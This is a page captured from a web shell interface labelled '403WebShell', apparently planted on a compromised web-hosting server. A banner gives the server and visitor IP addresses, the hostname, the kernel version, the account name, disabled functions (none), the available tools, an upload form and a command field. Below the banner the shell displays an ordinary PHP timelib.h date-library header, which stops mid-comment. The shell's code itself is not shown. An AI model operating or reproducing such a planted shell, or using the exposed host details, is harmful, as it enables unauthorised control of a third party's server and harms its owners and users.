Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.142.113
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/php80/usr/include/php/ext/date/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/php80/usr/include/php/ext/date/lib/timelib.h
/*
 * The MIT License (MIT)
 *
 * Copyright (c) 2015-2019 Derick Rethans
 * Copyright (c) 2018 MongoDB, Inc.
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#ifndef __TIMELIB_H__
#define __TIMELIB_H__

#ifdef HAVE_TIMELIB_CONFIG_H
# include "timelib_config.h"
#endif

#include <stdlib.h>
#include <stdbool.h>
#include <limits.h>
#include <inttypes.h>

# ifndef HAVE_INT32_T
#  if SIZEOF_INT == 4
typedef int int32_t;
#  elif SIZEOF_LONG == 4
typedef long int int32_t;
#  endif
# endif

# ifndef HAVE_UINT32_T
#  if SIZEOF_INT == 4
typedef unsigned int uint32_t;
#  elif SIZEOF_LONG == 4
typedef unsigned long int uint32_t;
#  endif
# endif

#ifdef _WIN32
# if _MSC_VER >= 1600
# include <stdint.h>
# endif
# ifndef SIZEOF_INT
#  define SIZEOF_INT 4
# endif
# ifndef SIZEOF_LONG
#  define SIZEOF_LONG 4
# endif
# ifndef int32_t
typedef __int32           int32_t;
# endif
# ifndef uint32_t
typedef unsigned __int32  uint32_t;
# endif
# ifndef int64_t
typedef __int64           int64_t;
# endif
# ifndef uint64_t
typedef unsigned __int64  uint64_t;
# endif
# ifndef PRId32
#  define PRId32       "I32d"
# endif
# ifndef PRIu32
#  define PRIu32       "I32u"
# endif
# ifndef PRId64
#  define PRId64       "I64d"
# endif
# ifndef PRIu64
#  define PRIu64       "I64u"
# endif
# ifndef INT32_MAX
#define INT32_MAX    _I32_MAX
# endif
# ifndef INT32_MIN
#define INT32_MIN    ((int32_t)_I32_MIN)
# endif
# ifndef UINT32_MAX
#define UINT32_MAX   _UI32_MAX
# endif
# ifndef INT64_MIN
#define INT64_MIN    ((int64_t)_I64_MIN)
# endif
# ifndef INT64_MAX
#define INT64_MAX    _I64_MAX
# endif
# ifndef UINT64_MAX
#define UINT64_MAX   _UI64_MAX
# endif
#endif

#if (defined(__x86_64__) || defined(__LP64__) || defined(_LP64) || defined(_WIN64)) && !defined(TIMELIB_FORCE_LONG32)
typedef int64_t timelib_long;
typedef uint64_t timelib_ulong;
# define TIMELIB_LONG_MAX INT64_MAX
# define TIMELIB_LONG_MIN INT64_MIN
# define TIMELIB_ULONG_MAX UINT64_MAX
# define TIMELIB_LONG_FMT "%" PRId64
# define TIMELIB_ULONG_FMT "%" PRIu64
#else
typedef int32_t timelib_long;
typedef uint32_t timelib_ulong;
# define TIMELIB_LONG_MAX INT32_MAX
# define TIMELIB_LONG_MIN INT32_MIN
# define TIMELIB_ULONG_MAX UINT32_MAX
# define TIMELIB_LONG_FMT "%" PRId32
# define TIMELIB_ULONG_FMT "%" PRIu32
#endif

#if defined(_MSC_VER)
typedef uint64_t timelib_ull;
typedef int64_t timelib_sll;
# define TIMELIB_LL_CONST(n) n ## i64
#else
typedef unsigned long long timelib_ull;
typedef signed long long timelib_sll;
# define TIMELIB_LL_CONST(n) n ## ll
#endif

typedef struct _ttinfo ttinfo;
typedef struct _tlinfo tlinfo;

typedef struct _tlocinfo
{
	char country_code[3];
	double latitude;
	double longitude;
	char *comments;
} tlocinfo;

typedef struct _timelib_tzinfo
{
	char    *name;
	struct {
		uint32_t ttisgmtcnt;
		uint32_t ttisstdcnt;
		uint32_t leapcnt;
		uint32_t timecnt;
		uint32_t typecnt;
		uint32_t charcnt;
	} _bit32;
	struct {
		uint64_t ttisgmtcnt;
		uint64_t ttisstdcnt;
		uint64_t leapcnt;
		uint64_t timecnt;
		uint64_t typecnt;
		uint64_t charcnt;
	} bit64;

	int64_t *trans;
	unsigned char *trans_idx;

	ttinfo  *type;
	char    *timezone_abbr;

	tlinfo  *leap_times;
	unsigned char bc;
	tlocinfo location;
} timelib_tzinfo;

typedef struct _timelib_rel_time {
	timelib_sll y, m, d; /* Years, Months and Days */
	timelib_sll h, i, s; /* Hours, mInutes and Seconds */
	timelib_sll us;      /* Microseconds */

	int weekday; /* Stores the day in 'next monday' */
	int weekday_behavior; /* 0: the current day should *not* be counted when advancing forwards; 1: the current day *should* be counted */

	int first_last_day_of;
	int invert; /* Whether the difference should be inverted */
	timelib_sll days; /* Contains the number of *days*, instead of Y-M-D differences */

	struct {
		unsigned int type;
		timelib_sll amount;
	} special;

	unsigned int   have_weekday_relative, have_special_relative;
} timelib_rel_time;

typedef struct _timelib_time_offset {
	int32_t      offset;
	unsigned int leap_secs;
	unsigned int is_dst;
	char        *abbr;
	timelib_sll  transition_time;
} timelib_time_offset;

typedef struct _timelib_time {
	timelib_sll      y, m, d;     /* Year, Month, Day */
	timelib_sll      h, i, s;     /* Hour, mInute, Second */
	timelib_sll      us;          /* Microseconds */
	int              z;           /* UTC offset in seconds */
	char            *tz_abbr;     /* Timezone abbreviation (display only) */
	timelib_tzinfo  *tz_info;     /* Timezone structure */
	signed int       dst;         /* Flag if we were parsing a DST zone */
	timelib_rel_time relative;

	timelib_sll      sse;         /* Seconds since epoch */

	unsigned int   have_time, have_date, have_zone, have_relative, have_weeknr_day;

	unsigned int   sse_uptodate; /* !0 if the sse member is up to date with the date/time members */
	unsigned int   tim_uptodate; /* !0 if the date/time members are up to date with the sse member */
	unsigned int   is_localtime; /*  1 if the current struct represents localtime, 0 if it is in GMT */
	unsigned int   zone_type;    /*  1 time offset,
	                              *  3 TimeZone identifier,
	                              *  2 TimeZone abbreviation */
} timelib_time;

typedef struct _timelib_abbr_info {
	timelib_sll  utc_offset;
	char        *abbr;
	int          dst;
} timelib_abbr_info;

#define TIMELIB_WARN_MASK                      0x1ff
#define TIMELIB_ERR_MASK                       0x2ff

#define TIMELIB_WARN_DOUBLE_TZ                 0x101
#define TIMELIB_WARN_INVALID_TIME              0x102
#define TIMELIB_WARN_INVALID_DATE              0x103
#define TIMELIB_WARN_TRAILING_DATA             0x11a

#define TIMELIB_ERR_DOUBLE_TZ                  0x201
#define TIMELIB_ERR_TZID_NOT_FOUND             0x202
#define TIMELIB_ERR_DOUBLE_TIME                0x203
#define TIMELIB_ERR_DOUBLE_DATE                0x204
#define TIMELIB_ERR_UNEXPECTED_CHARACTER       0x205
#define TIMELIB_ERR_EMPTY_STRING               0x206
#define TIMELIB_ERR_UNEXPECTED_DATA            0x207
#define TIMELIB_ERR_NO_TEXTUAL_DAY             0x208
#define TIMELIB_ERR_NO_TWO_DIGIT_DAY           0x209
#define TIMELIB_ERR_NO_THREE_DIGIT_DAY_OF_YEAR 0x20a
#define TIMELIB_ERR_NO_TWO_DIGIT_MONTH         0x20b
#define TIMELIB_ERR_NO_TEXTUAL_MONTH           0x20c
#define TIMELIB_ERR_NO_TWO_DIGIT_YEAR          0x20d
#define TIMELIB_ERR_NO_FOUR_DIGIT_YEAR         0x20e
#define TIMELIB_ERR_NO_TWO_DIGIT_HOUR          0x20f
#define TIMELIB_ERR_HOUR_LARGER_THAN_12        0x210
#define TIMELIB_ERR_MERIDIAN_BEFORE_HOUR       0x211
#define TIMELIB_ERR_NO_MERIDIAN                0x212
#define TIMELIB_ERR_NO_TWO_DIGIT_MINUTE        0x213
#define TIMELIB_ERR_NO_TWO_DIGIT_SECOND        0x214
#define TIMELIB_ERR_NO_SIX_DIGIT_MICROSECOND   0x215
#define TIMELIB_ERR_NO_SEP_SYMBOL              0x216
#define TIMELIB_ERR_EXPECTED_ESCAPE_CHAR       0x217
#define TIMELIB_ERR_NO_ESCAPED_CHAR            0x218
#define TIMELIB_ERR_WRONG_FORMAT_SEP           0x219
#define TIMELIB_ERR_TRAILING_DATA              0x21a
#define TIMELIB_ERR_DATA_MISSING               0x21b
#define TIMELIB_ERR_NO_THREE_DIGIT_MILLISECOND 0x21c
#define TIMELIB_ERR_NO_FOUR_DIGIT_YEAR_ISO     0x21d
#define TIMELIB_ERR_NO_TWO_DIGIT_WEEK          0x21e
#define TIMELIB_ERR_INVALID_WEEK               0x21f
#define TIMELIB_ERR_NO_DAY_OF_WEEK             0x220
#define TIMELIB_ERR_INVALID_DAY_OF_WEEK        0x221
#define TIMELIB_ERR_INVALID_SPECIFIER          0x222
#define TIMELIB_ERR_INVALID_TZ_OFFSET          0x223
#define TIMELIB_ERR_FORMAT_LITERAL_MISMATCH    0x224
#define TIMELIB_ERR_MIX_ISO_WITH_NATURAL       0x225

#define TIMELIB_ZONETYPE_OFFSET 1
#define TIMELIB_ZONETYPE_ABBR   2
#define TIMELIB_ZONETYPE_ID     3

typedef struct _timelib_error_message {
	int         error_code;
	int         position;
	char        character;
	char       *message;
} timelib_error_message;

typedef struct _timelib_error_container {
	timelib_error_message *error_messages;
	timelib_error_message *warning_messages;
	int                    error_count;
	int                    warning_count;
} timelib_error_container;

typedef struct _timelib_tz_lookup_table {
	char       *name;
	int         type;
	float       gmtoffset;
	char       *full_tz_name;
} timelib_tz_lookup_table;

typedef struct _timelib_tzdb_index_entry {
	char *id;
	unsigned int pos;
} timelib_tzdb_index_entry;

typedef struct _timelib_tzdb {
	char                           *version;
	int                             index_size;
	const timelib_tzdb_index_entry *index;
	const unsigned char            *data;
} timelib_tzdb;

#ifndef timelib_malloc
# define timelib_malloc  malloc
# define timelib_realloc realloc
# define timelib_calloc  calloc
# define timelib_strdup  strdup
# define timelib_free    free
#endif

#define TIMELIB_VERSION 202003
#define TIMELIB_EXTENDED_VERSION 20203001
#define TIMELIB_ASCII_VERSION "2020.03"

#define TIMELIB_NONE             0x00
#define TIMELIB_OVERRIDE_TIME    0x01
#define TIMELIB_NO_CLONE         0x02

#define TIMELIB_UNSET   -99999

/* An entry for each of these error codes is also in the
 * timelib_error_messages array in timelib.c */
#define TIMELIB_ERROR_NO_ERROR                            0x00
#define TIMELIB_ERROR_CANNOT_ALLOCATE                     0x01
#define TIMELIB_ERROR_CORRUPT_TRANSITIONS_DONT_INCREASE   0x02
#define TIMELIB_ERROR_CORRUPT_NO_64BIT_PREAMBLE           0x03
#define TIMELIB_ERROR_CORRUPT_NO_ABBREVIATION             0x04
#define TIMELIB_ERROR_UNSUPPORTED_VERSION                 0x05
#define TIMELIB_ERROR_NO_SUCH_TIMEZONE                    0x06
#define TIMELIB_ERROR_SLIM_FILE                           0x07

#ifdef __cplusplus
extern "C" {
#endif

typedef enum _timelib_format_specifier_code {
	TIMELIB_FORMAT_ALLOW_EXTRA_CHARACTERS = 0,
	TIMELIB_FORMAT_ANY_SEPARATOR,
	TIMELIB_FORMAT_DAY_TWO_DIGIT,
	TIMELIB_FORMAT_DAY_TWO_DIGIT_PADDED,
	TIMELIB_FORMAT_DAY_OF_WEEK_ISO,
	TIMELIB_FORMAT_DAY_OF_WEEK,
	TIMELIB_FORMAT_DAY_OF_YEAR,
	TIMELIB_FORMAT_DAY_SUFFIX,
	TIMELIB_FORMAT_END,
	TIMELIB_FORMAT_EPOCH_SECONDS,
	TIMELIB_FORMAT_ESCAPE,
	TIMELIB_FORMAT_HOUR_TWO_DIGIT_12_MAX,
	TIMELIB_FORMAT_HOUR_TWO_DIGIT_12_MAX_PADDED,
	TIMELIB_FORMAT_HOUR_TWO_DIGIT_24_MAX,
	TIMELIB_FORMAT_HOUR_TWO_DIGIT_24_MAX_PADDED,
	TIMELIB_FORMAT_LITERAL,
	TIMELIB_FORMAT_MERIDIAN,
	TIMELIB_FORMAT_MICROSECOND_SIX_DIGIT,
	TIMELIB_FORMAT_MILLISECOND_THREE_DIGIT,
	TIMELIB_FORMAT_MINUTE_TWO_DIGIT,
	TIMELIB_FORMAT_MONTH_TWO_DIGIT,
	TIMELIB_FORMAT_MONTH_TWO_DIGIT_PADDED,
	TIMELIB_FORMAT_RANDOM_CHAR,
	TIMELIB_FORMAT_RESET_ALL,
	TIMELIB_FORMAT_RESET_ALL_WHEN_NOT_SET,
	TIMELIB_FORMAT_SECOND_TWO_DIGIT,
	TIMELIB_FORMAT_SEPARATOR,
	TIMELIB_FORMAT_SKIP_TO_SEPARATOR,
	TIMELIB_FORMAT_TEXTUAL_DAY_3_LETTER,
	TIMELIB_FORMAT_TEXTUAL_DAY_FULL,
	TIMELIB_FORMAT_TEXTUAL_MONTH_3_LETTER,
	TIMELIB_FORMAT_TEXTUAL_MONTH_FULL,
	TIMELIB_FORMAT_TIMEZONE_OFFSET,
	TIMELIB_FORMAT_TIMEZONE_OFFSET_MINUTES,
	TIMELIB_FORMAT_WEEK_OF_YEAR_ISO,
	TIMELIB_FORMAT_WEEK_OF_YEAR,
	TIMELIB_FORMAT_WHITESPACE,
	TIMELIB_FORMAT_YEAR_TWO_DIGIT,
	TIMELIB_FORMAT_YEAR_FOUR_DIGIT,
	TIMELIB_FORMAT_YEAR_ISO
} timelib_format_specifier_code;

typedef struct _timelib_format_specifier {
	char                          specifier;
	timelib_format_specifier_code code;
} timelib_format_specifier;

typedef struct _timelib_format_config {
	const timelib_format_specifier *format_map;
	/* Format speciifiers must be preceded by 'prefix_char' if not '\0'. */
	char                            prefix_char;
} timelib_format_config;

/* Function pointers */
typedef timelib_tzinfo* (*timelib_tz_get_wrapper)(const char *tzname, const timelib_tzdb *tzdb, int *error_code);

/* From dow.c */
/* Calculates the day of the week from y, m, and d. 0=Sunday..6=Saturday */
timelib_sll timelib_day_of_week(timelib_sll y, timelib_sll m, timelib_sll d);

/* Calculates the day of the ISO week from y, m, and d. 1=Monday, 7=Sunday */
timelib_sll timelib_iso_day_of_week(timelib_sll y, timelib_sll m, timelib_sll d);

/* Calculates the day of the year according to y-m-d. 0=Jan 1st..364/365=Dec
 * 31st */
timelib_sll timelib_day_of_year(timelib_sll y, timelib_sll m, timelib_sll d);

/* Calculates the day of the year according to y-w-dow. 0..364/365 */
timelib_sll timelib_daynr_from_weeknr(timelib_sll iy, timelib_sll iw, timelib_sll id);

/* Calculates the number of days in month m for year y. 28..31 */
timelib_sll timelib_days_in_month(timelib_sll y, timelib_sll m);

/* Calculates the ISO year and week from y, m, and d, into iw and iy */
void timelib_isoweek_from_date(timelib_sll y, timelib_sll m, timelib_sll d, timelib_sll *iw, timelib_sll *iy);

/* Calculates the ISO year, week, and day of week from y, m, and d, into iy,
 * iw, and id */
void timelib_isodate_from_date(timelib_sll y, timelib_sll m, timelib_sll d, timelib_sll *iy, timelib_sll *iw, timelib_sll *id);

/* Calculates the year, month, and day from iy, iw, and iw, into y, m, and d */
void timelib_date_from_isodate(timelib_sll iy, timelib_sll iw, timelib_sll id, timelib_sll *y, timelib_sll *m, timelib_sll *d);

/* Returns true if h, i and s fit in the range 00:00:00..23:59:59, false
 * otherwise */
int timelib_valid_time(timelib_sll h, timelib_sll i, timelib_sll s);

/* Returns true if m fits in the range 1..12, and d fits in the range
 * 1..<days-in-month> for year y */
int timelib_valid_date(timelib_sll y, timelib_sll m, timelib_sll d);

/* From parse_date.re */

/* Parses the date/time string in 's' with length 'len' into the constituent
 * parts of timelib_time*.
 *
 * Depending on the contents of the string 's', not all elements might be
 * filled. You can check whether a specific element has been parsed by
 * comparing with the TIMELIB_UNSET define.
 *
 * If errors occur, this function keeps already parsed elements in the
 * returned timelib_time* value.
 *
 * If the **errors points to a timelib_error_container variable, warnings
 * and errors will be recorded. You are responsible for freeing the stored
 * information with timelib_error_container_dtor(). To see whether errors have
 * occurred, inspect errors->errors_count. To see whether warnings have occurred,
 * inspect errors->warnings_count.
 *
 * The returned timelib_time* value is dynamically allocated and should be
 * freed with timelib_time_dtor().
 */
timelib_time *timelib_strtotime(const char *s, size_t len, timelib_error_container **errors, const timelib_tzdb *tzdb, timelib_tz_get_wrapper tz_get_wrapper);

/* Parses the date/time string in 's' with length 'len' into the constituent
 * parts of timelib_time* according to the format in 'format'.
 *
 * Depending on the contents of the string 's', not all elements might be
 * filled. You can check whether a specific element has been parsed by
 * comparing with the TIMELIB_UNSET define.
 *
 * If errors occur, this function keeps already parsed elements in the
 * returned timelib_time* value.
 *
 * If the **errors points to a timelib_error_container variable, warnings
 * and errors will be recorded. You are responsible for freeing the stored
 * information with timelib_error_container_dtor(). To see whether errors have
 * occurred, inspect errors->errors_count. To see whether warnings have occurred,
 * inspect errors->warnings_count.
 *
 * The returned timelib_time* value is dynamically allocated and should be
 * freed with timelib_time_dtor().
 */
timelib_time *timelib_parse_from_format(const char *format, const char *s, size_t len, timelib_error_container **errors, const timelib_tzdb *tzdb, timelib_tz_get_wrapper tz_get_wrapper);

/* Parses the date/time string in 's' with length 'len' into the constituent
 * parts of timelib_time* according to the format in 'format' with format
 * specifier configuration 'format_config'.
 *
 * 'format_map' is an array of pairs, with the first element being the format
 * specifier as a character and the second element corresponds to the
 * representation of the specifier from the enum list
 * 'timelib_format_specifier_code'.
 *
 * Note: 'format_map' must be terminated with specifier '\0' to indicate to the
 * parser that there are no more format specifiers in the list.
 */
timelib_time *timelib_parse_from_format_with_map(const char *format, const char *s, size_t len, timelib_error_container **errors, const timelib_tzdb *tzdb, timelib_tz_get_wrapper tz_get_wrapper, const timelib_format_config* format_config);

/* Fills the gaps in the parsed timelib_time with information from the reference date/time in 'now'
 *
 * If any of the 'parsed' y, m, d, h, i or s parameters is unset (TIMELIB_UNSET):
 * - if microtime (us) is unset, then the us of the parsed time is set to 0.
 * - else if microtime (us) is unset and 'now'->'us' is set, use it, otherwise use 0.
 *
 * For either of the 'parsed' y, m, d, h, i, s, z (utc offset in seconds) or
 * dst is unset, set it to the corresponding value in 'now' if set, otherwise
 * set it to 0.
 *
 * It duplicates tz_abbr if unset in 'parsed' but set in 'now'.
 *
 * It duplicates tz_info if unset in 'parsed', but set in 'now' unless
 * TIMELIB_NO_CLONE is passed, in which case only the pointer in 'parsed' is
 * set to 'now'.
 *
 * If the option TIMELIB_OVERRIDE_TIME is passed and the parsed date/time has
 * no time portion, the function will ignore the time aspect in 'now' and
 * instead fill it with zeros.
 */
void timelib_fill_holes(timelib_time *parsed, timelib_time *now, int options);

/* Tries to convert a time zone abbreviation, gmtoffset and/or isdst flag
 * combination to a time zone identifier.
 *
 * If 'abbr' is either 'utc' or 'gmt' (case insensitve) then "UTC" is
 * returned.
 *
 * It first uses the data in the timezonemap.h file to find a matching
 * abbreviation/GMT offset combination. If not found, it uses the data in
 * fallbackmap.h to match only the GMT offset/isdst flag to try to find a
 * match. If nothing is found, NULL is returned.
 *
 * The returned char* is not duplicated, and should not be freed.
 */
char *timelib_timezone_id_from_abbr(const char *abbr, timelib_long gmtoffset, int isdst);

/* Returns an array of known time zone abbreviations
 *
 * This file is generated from the time zone database through the
 * gettzmapping.php scripts, which requires that an up-to-date time zone
 * database is used with the PHP binary that runs the script.
 *
 * Each item in the returned list contains the abbreviation, a flag whether
 * it's an abbreviation used with DST, the UTC offset in seconds, and the name
 * of the time zone identifier that this abbreviation belongs to.
 *
 * The order for each specific abbreviation is controlled through the
 * preference list in the gettzmapping.php script. Time zones that match the
 * pattern ±\d{2,4} are excluded
 */
const timelib_tz_lookup_table *timelib_timezone_abbreviations_list(void);

/**
 * DEPRECATED, but still used by PHP.
 */
timelib_long timelib_parse_zone(const char **ptr, int *dst, timelib_time *t, int *tz_not_found, const timelib_tzdb *tzdb, timelib_tz_get_wrapper tz_wrapper);

/* From parse_iso_intervals.re */

/**
 * Parses a subset of an ISO 8601 intervals specification string into its
 * constituent parts.
 *
 * If the **errors points to a timelib_error_container variable, warnings
 * and errors will be recorded. You are responsible for freeing the stored
 * information with timelib_error_container_dtor(). To see whether errors have
 * occurred, inspect errors->errors_count. To see whether warnings have occurred,
 * inspect errors->warnings_count.
 */
void timelib_strtointerval(const char *s, size_t len,
                           timelib_time **begin, timelib_time **end,
                           timelib_rel_time **period, int *recurrences,
                           timelib_error_container **errors);


/* From tm2unixtime.c */

/**
 * Uses the y/m/d/h/i/s fields to calculate and store the equivalent timestamp
 * in the sse field.
 *
 * It uses the time zone information associated with 'time' to account for the
 * right UTC offset and/or DST rules. You can associate time zone information
 * with the timelib_set_timezone_* functions (see below).
 *
 * If the type is 'TIMELIB_ZONETYPE_ID' and there is no associated tzinfo, it
 * will use the second argument 'tzi' to provide the rules necessary to
 * calculate the right timestamp.
 */
void timelib_update_ts(timelib_time* time, timelib_tzinfo* tzi);

/**
 * Takes the information from the y/m/d/h/i/s fields and makes sure their
 * values are in the right range.
 *
 * If a value under- or overflows it will adjust the larger measure up (or
 * down). It also takes into account leap days.
 */
void timelib_do_normalize(timelib_time *base);

/**
 * Takes the information from the y/m/d/h/i/s fields of 'rt' and makes sure
 * their values are in the right range.
 *
 * If a value under- or overflows it will adjust the larger measure up (or
 * down). As this function operates on a *relative date/time*, it also takes
 * into account leap days and correctly accounts for the difference depending
 * on the base date/time in 'base'.
 */
void timelib_do_rel_normalize(timelib_time *base, timelib_rel_time *rt);

/* From unixtime2tm.c */

/**
 * Takes the unix timestamp in seconds from 'ts' and populates the y/m/d/h/i/s
 * fields of 'tm' without taking time zones into account
 */
void timelib_unixtime2gmt(timelib_time* tm, timelib_sll ts);

/**
 * Takes the Unix timestamp from 'ts', and calculates the y/m/d/h/i/s fields
 * according to the time zone information attached to 'tm'.
 */
void timelib_unixtime2local(timelib_time *tm, timelib_sll ts);

/**
 * Takes the Unix timestamp stored in 'tm', and calculates the y/m/d/h/i/s
 * fields according to the time zone information attached to 'tm'.
 */
void timelib_update_from_sse(timelib_time *tm);

/**
 * Attaches the UTC offset as time zone information to 't'.
 *
 * 'utc_offset' is in seconds East of UTC.
 */
void timelib_set_timezone_from_offset(timelib_time *t, timelib_sll utc_offset);

/**
 * Attaches the information from 'abbr_info' as time zone information to 't'.
 *
 * The timelib_abbr_info struct contains an abbreviation ('abbr') which string
 * value is duplicated, as well as a 'utc_offset' and 'dst' flag. It only
 * supports a 'dst' change over of 1 hour.
 */
void timelib_set_timezone_from_abbr(timelib_time *t, timelib_abbr_info abbr_info);

/**
 * Attaches the time zone information in 'tz' to to 't'.
 *
 * It fetches the right UTC offset that is currently stored in the time
 * stamp field in 't' ('sse'), and assigns that to the 'z' field and 'dst'
 * field (whether DST is in effect at the time). It also sets the current
 * abbreviation to the 'tz_addr' field, making sure that if a value was already
 * set it was freed.
 *
 * The time zone information in 'tz' is *not* duplicated into the 't' field so
 * it should not be freed until all timelib_time* variables have been freed as
 * well.
 */
void timelib_set_timezone(timelib_time *t, timelib_tzinfo *tz);

/* From parse_tz.c */

/**
 * Returns whether the time zone ID 'timezone' is available in the time zone
 * database as pointed to be 'tzdb'.
 */
int timelib_timezone_id_is_valid(const char *timezone, const timelib_tzdb *tzdb);

/**
 * Converts the binary stored time zone information from 'tzdb' for the time
 * zone 'timezone' into a structure the library can use for calculations.
 *
 * The function can be used on both timelib_builtin_db as well as a time zone
 * db as opened by timelib_zoneinfo.
 *
 * 'error_code' must not be a null pointer, and will always be written to. If
 * the value is TIMELIB_ERROR_NO_ERROR then the file was parsed without
 * problems.
 *
 * The function will return null upon failure, and also set an error code
 * through 'error_code'.
 *
 * The error code is one of the TIMELIB_ERROR_* constants as listed above.
 * These error constants can be converted into a string by
 * timelib_get_error_message.
 *
 * If the function returns not-null, the 'error_code' might have a non-null
 * value that can be used to detect incompatibilities. The only one that is
 * currently detected is whether the file is a 'slim' file, in which case
 * 'error_code' will be set to TIMELIB_ERROR_SLIM_FILE.
 *
 * This function allocates memory for the new time zone structure, which must
 * be freed after use. Although it is recommended that a cache of each used
 * time zone is kept.
 */
timelib_tzinfo *timelib_parse_tzfile(const char *timezone, const timelib_tzdb *tzdb, int *error_code);

/**
 * Frees up the resources allocated by 'timelib_parse_tzfile'.
 */
void timelib_tzinfo_dtor(timelib_tzinfo *tz);

/**
 * Deep-clones a timelib_tzinfo structure.
 *
 * This allocates resources that need to be freed with 'timelib_tzinfo_dtor'
 */
timelib_tzinfo* timelib_tzinfo_clone(timelib_tzinfo *tz);

/**
 * Returns whether DST is active with time zone 'tz' for the time stamp 'ts'.
 *
 * Returns 0 if DST is not active, 1 if DST is active, or -1 if no transitions
 * were available through 'tz'.
 */
int timelib_timestamp_is_in_dst(timelib_sll ts, timelib_tzinfo *tz);

/**
 * Returns offset information with time zone 'tz' for the time stamp 'ts'.
 *
 * The returned information contains: the offset in seconds East of UTC (in
 * 'offset'), whether DST is active ('is_dst'), what the current time zone
 * abbreviation is ('abbr') and the transition time that got to this state (in
 * 'transition_time');
 */
timelib_time_offset *timelib_get_time_zone_info(timelib_sll ts, timelib_tzinfo *tz);

/**
 * Returns the UTC offset currently applicable for the information stored in 't'.
 *
 * The value returned is the UTC offset in seconds East.
 */
timelib_sll timelib_get_current_offset(timelib_time *t);

/**
 * Displays debugging information about the time zone information in 'tz'.
 */
void timelib_dump_tzinfo(timelib_tzinfo *tz);

/**
 * Returns a pointer to the built-in time zone database.
 *
 * You must *not* free the returned pointer as it is part of the text segment.
 */
const timelib_tzdb *timelib_builtin_db(void);

/**
 * Returns a pointer to the start of an array containing a list of timezone identifiers.
 *
 * The amount of entries in the array is returned through the 'count' OUT parameter.
 *
 * Each entry contains the time zone ID ('id' field), and the position within the time zone
 * information ('pos' field). The pos field should not be used.
 */
const timelib_tzdb_index_entry *timelib_timezone_identifiers_list(const timelib_tzdb *tzdb, int *count);

/* From parse_zoneinfo.c */

/**
 * Scans the directory and subdirectories of 'directory' for valid time zone files and builds
 * a time zone database out of these files.
 *
 * Typically, the directory should point to '/usr/share/zoneinfo'.
 *
 * Unlike 'timelib_builtin_db', the return value of this function must be freed
 * with the 'timelib_zoneinfo_dtor' function.
 */
timelib_tzdb *timelib_zoneinfo(const char *directory);

/**
 * Frees up the resources as created through 'timelib_zoneinfo'.
 *
 * This function must be used to free up all the resources that have been
 * allocated while calling 'timelib_zoneinfo'.
 */
void timelib_zoneinfo_dtor(timelib_tzdb *tzdb);

/* From timelib.c */

/**
 * Returns a static string containing an error message belonging to a specific
 * error code.
 */
const char *timelib_get_error_message(int error_code);

/**
 * Allocates resources for the relative time structure.
 *
 * Must be freed with 'timelib_rel_time_dtor'.
 */
timelib_rel_time* timelib_rel_time_ctor(void);

/**
 * Frees up the resources as allocated through 'timelib_rel_time_ctor'.
 */
void timelib_rel_time_dtor(timelib_rel_time* t);

/**
 * Creates a new timelib_rel_time resource and copies over the information
 * from 'tz'.
 *
 * Must be freed with 'timelib_rel_time_dtor'.
 */
timelib_rel_time* timelib_rel_time_clone(timelib_rel_time *tz);

/**
 * Allocates resources for the time structure.
 *
 * Must be freed with 'timelib_time_dtor'.
 */
timelib_time* timelib_time_ctor(void);

/**
 * Frees up the resources as allocated through 'timelib_time_ctor'.
 */
void timelib_time_dtor(timelib_time* t);

/**
 * Creates a new timelib_time resource and copies over the information
 * from 'orig'.
 *
 * Must be freed with 'timelib_time_dtor'.
 */
timelib_time* timelib_time_clone(timelib_time* orig);

/**
 * Compares two timelib_time structures and returns which one is earlier in
 * time.
 *
 * To decide which comes earlier it uses the 'sse' (Seconds Since Epoch) and
 * 'us' (microseconds) fields.
 *
 * Returns -1 if t1 < t2, 0 if t1 == t2, and -1 if t1 > t2.
 */
int timelib_time_compare(timelib_time *t1, timelib_time *t2);

/**
 * Allocates resources for the time offset structure.
 *
 * Must be freed with 'timelib_time_offset_dtor'.
 */
timelib_time_offset* timelib_time_offset_ctor(void);

/**
 * Frees up the resources as allocated through 'timelib_time_offset_ctor'.
 */
void timelib_time_offset_dtor(timelib_time_offset* t);

/**
 * Frees up the resources allocated while converting strings to timelib_time
 * structures with the timelib_strtotime and timelib_strtointerval functions.
 */
void timelib_error_container_dtor(timelib_error_container *errors);

/**
 * Converts the 'sse' value of 'd' to a timelib_long type.
 *
 * If the value fits in the TIMELIB_LONG_MIN and TIMELIB_LONG_MAX range, the
 * value is cast to (timelib_long) and returned. If *error is not a NULL
 * pointer, it will be set to 0.
 *
 * If the value does *not* fit in the range, the function returns 0 and if
 * *error is not a NULL pointer, it will be set to 1.
 *
 * timelib_long is a 32 bit signed long integer on 32 bit platforms, and a 64
 * bit signed long long integer on 64 bit platforms. In other words, it makes
 * sure that the value in 'sse' (which is always a signed long long 64 bit
 * integer) can be used safely outside of the library.
 */
timelib_long timelib_date_to_int(timelib_time *d, int *error);

/**
 * Displays debugging information about the date/time information stored in 'd'.
